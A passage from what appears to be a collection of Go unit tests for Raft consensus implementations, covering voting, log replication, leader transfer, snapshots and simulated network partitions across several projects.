Term: 1, Data: []byte(\"some data\")}}\n\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"nextEnts = %+v, want %+v\", g, wents)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\tfor i, m := range msgs {\n\t\tif w := uint64(i + 2); m.To != w {\n\t\t\tt.Errorf(\"to = %x, want %x\", m.To, w)\n\t\t}\n\t\tif m.Type != pb.MsgApp {\n\t\t\tt.Errorf(\"type = %v, want %v\", m.Type, pb.MsgApp)\n\t\t}\n\t\tif m.Commit != li+1 {\n\t\t\tt.Errorf(\"commit = %d, want %d\", m.Commit, li+1)\n\t\t}\n\t}\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func TestFollowerAppendEntries(t *testing.T) {\n\ttests := []struct {\n\t\tindex, term uint64\n\t\tents []pb.Entry\n\t\twents []pb.Entry\n\t\twunstable []pb.Entry\n\t}{\n\t\t{\n\t\t\t2, 2,\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}, {Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t1, 1,\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}},\n\t\t\tnil,\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append([]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}})\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index, Entries: tt.ents})\n\n\t\tif g := r.raftLog.allEntries(); !reflect.DeepEqual(g, tt.wents) {\n\t\t\tt.Errorf(\"#%d: ents = %+v, want %+v\", i, g, tt.wents)\n\t\t}\n\t\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, tt.wunstable) {\n\t\t\tt.Errorf(\"#%d: unstableEnts = %+v, want %+v\", i, g, tt.wunstable)\n\t\t}\n\t}\n}", "func TestClusteringFollowerDeleteChannelNotInSnapshot(t *testing.T) {\n\tcleanupDatastore(t)\n\tdefer cleanupDatastore(t)\n\tcleanupRaftLog(t)\n\tdefer cleanupRaftLog(t)\n\n\t// For this test, use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\tmaxInactivity := 250 * time.Millisecond\n\n\t// Configure first server\n\ts1sOpts := getTestDefaultOptsForClustering(\"a\", true)\n\ts1sOpts.Clustering.TrailingLogs = 0\n\ts1sOpts.MaxInactivity = maxInactivity\n\ts1 := runServerWithOpts(t, s1sOpts, nil)\n\tdefer s1.Shutdown()\n\n\t// Configure second server.\n\ts2sOpts := getTestDefaultOptsForClustering(\"b\", false)\n\ts2sOpts.Clustering.TrailingLogs = 0\n\ts2sOpts.MaxInactivity = maxInactivity\n\ts2 := runServerWithOpts(t, s2sOpts, nil)\n\tdefer s2.Shutdown()\n\n\t// Configure third server.\n\ts3sOpts := getTestDefaultOptsForClustering(\"c\", false)\n\ts3sOpts.Clustering.TrailingLogs = 0\n\ts3sOpts.MaxInactivity = maxInactivity\n\ts3 := runServerWithOpts(t, s3sOpts, nil)\n\tdefer s3.Shutdown()\n\n\tservers := []*StanServer{s1, s2, s3}\n\tfor _, s := range servers {\n\t\tcheckState(t, s, Clustered)\n\t}\n\n\t// Wait for leader to be elected.\n\tleader := getLeader(t, 10*time.Second, servers...)\n\n\t// Create a client connection.\n\tsc, err := stan.Connect(clusterName, clientName)\n\tif err != nil {\n\t\tt.Fatalf(\"Expected to connect correctly, got err %v\", err)\n\t}\n\tdefer sc.Close()\n\n\t// Send a message, which will create the channel\n\tchannel := \"foo\"\n\texpectedMsg := make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"first\")}\n\tif err := sc.Publish(channel, expectedMsg[1].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tsc.Close()\n\t// Wait for channel to be replicated in all servers\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 1, expectedMsg, servers...)\n\n\t// Kill a follower.\n\tvar follower *StanServer\n\tfor _, s := range servers {\n\t\tif leader != s {\n\t\t\tfollower = s\n\t\t\tbreak\n\t\t}\n\t}\n\tservers = removeServer(servers, follower)\n\tfollower.Shutdown()\n\n\t// Wait for more than the MaxInactivity\n\ttime.Sleep(2 * maxInactivity)\n\t// Check channel is no longer in leader\n\tverifyChannelExist(t, leader, channel, false, 5*time.Second)\n\t// Perform a snapshot after the channel has been deleted\n\tif err := leader.raft.Snapshot().Error(); err != nil {\n\t\tt.Fatalf(\"Error on snapshot: %v\", err)\n\t}\n\n\t// Restart the follower\n\tfollower = runServerWithOpts(t, follower.opts, nil)\n\tdefer follower.Shutdown()\n\tservers = append(servers, follower)\n\n\tgetLeader(t, 10*time.Second, servers...)\n\n\t// The follower will have recovered foo (from streaming store), but then from\n\t// the snapshot should realize that the channel no longer exits and should delete it.\n\tverifyChannelExist(t, follower, channel, false, 5*time.Second)\n}", "func TestLeaderTransferToUpToDateNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestClusteringFollowerDeleteOldChannelPriorToSnapshotRestore(t *testing.T) {\n\tcleanupDatastore(t)\n\tdefer cleanupDatastore(t)\n\tcleanupRaftLog(t)\n\tdefer cleanupRaftLog(t)\n\n\trestoreMsgsAttempts = 2\n\trestoreMsgsRcvTimeout = 50 * time.Millisecond\n\trestoreMsgsSleepBetweenAttempts = 0\n\tdefer func() {\n\t\trestoreMsgsAttempts = defaultRestoreMsgsAttempts\n\t\trestoreMsgsRcvTimeout = defaultRestoreMsgsRcvTimeout\n\t\trestoreMsgsSleepBetweenAttempts = defaultRestoreMsgsSleepBetweenAttempts\n\t}()\n\n\t// For this test, use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\tmaxInactivity := 250 * time.Millisecond\n\n\t// Configure first server\n\ts1sOpts := getTestDefaultOptsForClustering(\"a\", true)\n\ts1sOpts.Clustering.TrailingLogs = 0\n\ts1sOpts.MaxInactivity = maxInactivity\n\ts1 := runServerWithOpts(t, s1sOpts, nil)\n\tdefer s1.Shutdown()\n\n\t// Configure second server.\n\ts2sOpts := getTestDefaultOptsForClustering(\"b\", false)\n\ts2sOpts.Clustering.TrailingLogs = 0\n\ts2sOpts.MaxInactivity = maxInactivity\n\ts2 := runServerWithOpts(t, s2sOpts, nil)\n\tdefer s2.Shutdown()\n\n\t// Configure third server.\n\ts3sOpts := getTestDefaultOptsForClustering(\"c\", false)\n\ts3sOpts.Clustering.TrailingLogs = 0\n\ts3sOpts.MaxInactivity = maxInactivity\n\ts3 := runServerWithOpts(t, s3sOpts, nil)\n\tdefer s3.Shutdown()\n\n\tservers := []*StanServer{s1, s2, s3}\n\n\t// Wait for leader to be elected.\n\tleader := getLeader(t, 10*time.Second, servers...)\n\n\t// Create a client connection.\n\tsc, err := stan.Connect(clusterName, clientName)\n\tif err != nil {\n\t\tt.Fatalf(\"Expected to connect correctly, got err %v\", err)\n\t}\n\tdefer sc.Close()\n\n\t// Send a message, which will create the channel\n\tchannel := \"foo\"\n\texpectedMsg := make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"1\")}\n\texpectedMsg[2] = msg{sequence: 2, data: []byte(\"2\")}\n\texpectedMsg[3] = msg{sequence: 3, data: []byte(\"3\")}\n\tfor i := 1; i < 4; i++ {\n\t\tif err := sc.Publish(channel, expectedMsg[uint64(i)].data); err != nil {\n\t\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t\t}\n\t}\n\t// Wait for channel to be replicated in all servers\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 3, expectedMsg, servers...)\n\n\t// Shutdown a follower\n\tvar follower *StanServer\n\tfor _, s := range servers {\n\t\tif leader != s {\n\t\t\tfollower = s\n\t\t\tbreak\n\t\t}\n\t}\n\tservers = removeServer(servers, follower)\n\tfollower.Shutdown()\n\n\t// Let the channel be deleted\n\ttime.Sleep(2 * maxInactivity)\n\n\t// Now send a message that causes the channel to be recreated\n\texpectedMsg = make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"4\")}\n\tif err := sc.Publish(channel, expectedMsg[1].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 1, expectedMsg, servers...)\n\n\t// Perform snapshot on the leader.\n\tif err := leader.raft.Snapshot().Error(); err != nil {\n\t\tt.Fatalf(\"Error during snapshot: %v\", err)\n\t}\n\n\t// Now send another message then a sub to prevent deletion\n\texpectedMsg[2] = msg{sequence: 2, data: []byte(\"5\")}\n\tif err := sc.Publish(channel, expectedMsg[2].data); err != nil {\n\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t}\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 2, expectedMsg, servers...)\n\tsc.Subscribe(channel, func(_ *stan.Msg) {}, stan.DeliverAllAvailable())\n\n\t// Now restart the follower...\n\tfollower = runServerWithOpts(t, follower.opts, nil)\n\tdefer follower.Shutdown()\n\tservers = append(servers, follower)\n\tgetLeader(t, 10*time.Second, servers...)\n\n\t// Now check content of channel on the follower.\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 2, expectedMsg, follower)\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func TestTransferNonMember(t *testing.T) {\n\tr := newTestRaft(1, []uint64{2, 3, 4}, 5, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgTimeoutNow})\n\n\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgVoteResp})\n\tr.Step(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp})\n\tif r.state != StateFollower {\n\t\tt.Fatalf(\"state is %s, want StateFollower\", r.state)\n\t}\n}", "func TestRaftNetworkPartition(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftNetworkPartition\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n3 node.\n\tfsm3 := newTestFSM(ID3)\n\tcfg = getTestConfig(ID3, clusterPrefix+ID3)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn3 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn3.transport = NewMsgDropper(n3.transport, 111, 0)\n\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn3.Start(fsm3)\n\tn3.ProposeInitialMembership([]string{ID1, ID2, ID3})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower1, follower2 *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower1 = n2\n\t\tfollower2 = n3\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower1 = n1\n\t\tfollower2 = n3\n\tcase <-fsm3.leaderCh:\n\t\tleader = n3\n\t\tfollower1 = n1\n\t\tfollower2 = n2\n\t}\n\n\t// Propose a command on the leader.\n\tpending := leader.Propose([]byte(\"I'm data1\"))\n\t<-pending.Done\n\tif pending.Err != nil {\n\t\tt.Fatalf(\"Failed to propose command on leader side: %v\", pending.Err)\n\t}\n\n\t// Isolate the leader with follower1.\n\tleader.transport.(*msgDropper).Set(follower1.config.ID, 1)\n\tfollower1.transport.(*msgDropper).Set(leader.config.ID, 1)\n\t// Isolate the leader with follower2.\n\tleader.transport.(*msgDropper).Set(follower2.config.ID, 1)\n\tfollower2.transport.(*msgDropper).Set(leader.config.ID, 1)\n\n\t// Propose a second command on the partitioned leader.\n\tpending = leader.Propose([]byte(\"I'm data2\"))\n\n\t// Wait a new leader gets elected on the other side of the partition.\n\tvar newLeader *Raft\n\tselect {\n\tcase <-follower1.fsm.(*testFSM).leaderCh:\n\t\tnewLeader = follower1\n\tcase <-follower2.fsm.(*testFSM).leaderCh:\n\t\tnewLeader = follower2\n\t}\n\n\t// The partitioned leader should step down at some point and conclude the\n\t// command proposed after the network partition with 'ErrNotLeaderAnymore'.\n\t<-pending.Done\n\tif pending.Err != ErrNotLeaderAnymore {\n\t\tt.Fatalf(\"expected 'ErrNotLeaderAnymore' for the command proposed on partitioned leader\")\n\t}\n\n\t// Propose a new command on the newly elected leader, it should succeed.\n\tpending = newLeader.Propose([]byte(\"I'm data3\"))\n\t<-pending.Done\n\tif pending.Err != nil {\n\t\tt.Fatalf(\"Failed to propose on new leader side: %v\", pending.Err)\n\t}\n\n\t// Reconnect old leader and previous follower 1.\n\tleader.transport.(*msgDropper).Set(follower1.config.ID, 0)\n\tfollower1.transport.(*msgDropper).Set(leader.config.ID, 0)\n\t// Reconnect old leader and previous follower 2.\n\tleader.transport.(*msgDropper).Set(follower2.config.ID, 0)\n\tfollower2.transport.(*msgDropper).Set(leader.config.ID, 0)\n\n\t// At some point the old leader should join the new quorum and gets synced\n\t// from the new leader.\n\ttestEntriesEqual(\n\t\tleader.fsm.(*testFSM).appliedCh,\n\t\tnewLeader.fsm.(*testFSM).appliedCh, 2,\n\t)\n}", "func TestRaftVerifyRead(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftVerifyRead\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower = n2\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower = n1\n\t}\n\n\t// Verification on leader side should succeed.\n\tpending1 := leader.VerifyRead()\n\tpending2 := leader.VerifyRead()\n\t<-pending1.Done\n\t<-pending2.Done\n\tif pending1.Err != nil || pending2.Err != nil {\n\t\tt.Fatalf(\"VerifyRead on leader should succeed\")\n\t}\n\n\t// A new round.\n\tpending3 := leader.VerifyRead()\n\t<-pending3.Done\n\tif pending3.Err != nil {\n\t\tt.Fatalf(\"VerifyRead on leader should succeed\")\n\t}\n\n\t// Verification on follower side should fail.\n\tpending4 := follower.VerifyRead()\n\t<-pending4.Done\n\tif pending4.Err == nil {\n\t\tt.Fatalf(\"VerifyRead on follower should fail\")\n\t}\n\n\t// Create a network partition between \"1\" and \"2\"\n\tn1.transport.(*msgDropper).Set(ID2, 1)\n\tn2.transport.(*msgDropper).Set(ID1, 1)\n\n\t// Now there's a network partition between \"1\" and \"2\", verification should\n\t// either timeout or fail.\n\tpending1 = leader.VerifyRead()\n\tselect {\n\tcase <-pending1.Done:\n\t\tif pending1.Err == nil {\n\t\t\tlog.Fatalf(\"expected the verification to be timeout or failed in the case of partition\")\n\t\t}\n\tcase <-time.After(100 * time.Millisecond):\n\t}\n}", "func (sm *State_Machine) FollTesting(t *testing.T) {\n\n\t//Creating a follower which has just joined the cluster.\n\tvar follTC TestCases\n\tfollTC.t = t\n\tvar cmdReq = []string{\"read test\", \"read cs733\"}\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:1|votedFor:0|commitInd:0|>>>\n\n\t/*Sending an apped request*/\n\tfollTC.req = Append{Data: []byte(cmdReq[0])}\n\tfollTC.respExp = Commit{Data: []byte(\"5000\"), Err: []byte(\"I'm not leader\")}\n\tsm.ClientCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending appendEntry request*/\n\t//Suppose leader and follower are at same Term.\n\tentries1 := Logg{Logg: []MyLogg{{1, \"read test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 2, Logg: entries1, LeaderCom: 0}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting LogStore\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:1|votedFor:0|commitInd:0|lastApp:0|>>>\n\n\t//Sending Multiple entries\n\tentries2 := Logg{Logg: []MyLogg{{1, \"read test\"}, {1, \"read cloud\"}, {1, \"read cs733\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 1, Logg: entries2, LeaderCom: 1}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:3|votedFor:0|commitInd:1|lastApp:0|>>>\n\n\t//Suppose leader has higher Term than follower.\n\tentries3 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 2, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 1, Logg: entries3, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:4|votedFor:0|commitInd:2|lastApp:0|>>>\n\n\t//Suppose follower has higher Term than leader.\n\tentries4 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 2, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex does not matches.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 5, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex matches, but entry doesnt.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Everything is ok, but no entry.\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, LeaderCom: 2}\n\tfollTC.respExp = Alarm{T: 200}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending vote request*/\n\t//sending vote request with lower Term.\n\tfollTC.req = VoteReq{Term: 1, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:3|LoggIng:4|votedFor:1|commitInd:2|lastApp:0|>>>\n\n\t//checking against duplicate vote rquest\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending timeout*/\n\tfollTC.req = Timeout{}\n\tfollTC.respExp = Alarm{T: 150}\n\tsm.TimeoutCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Send{PeerId: 0, Event: VoteReq{Term: 4, CandId: 1000, PreLoggInd: 3, PreLoggTerm: 2}} //also the vote request\n\tfollTC.expect()\n\n}", "func TestLeaderElectionOverwriteNewerLogs(t *testing.T) {\n\ttestLeaderElectionOverwriteNewerLogs(t, false)\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", 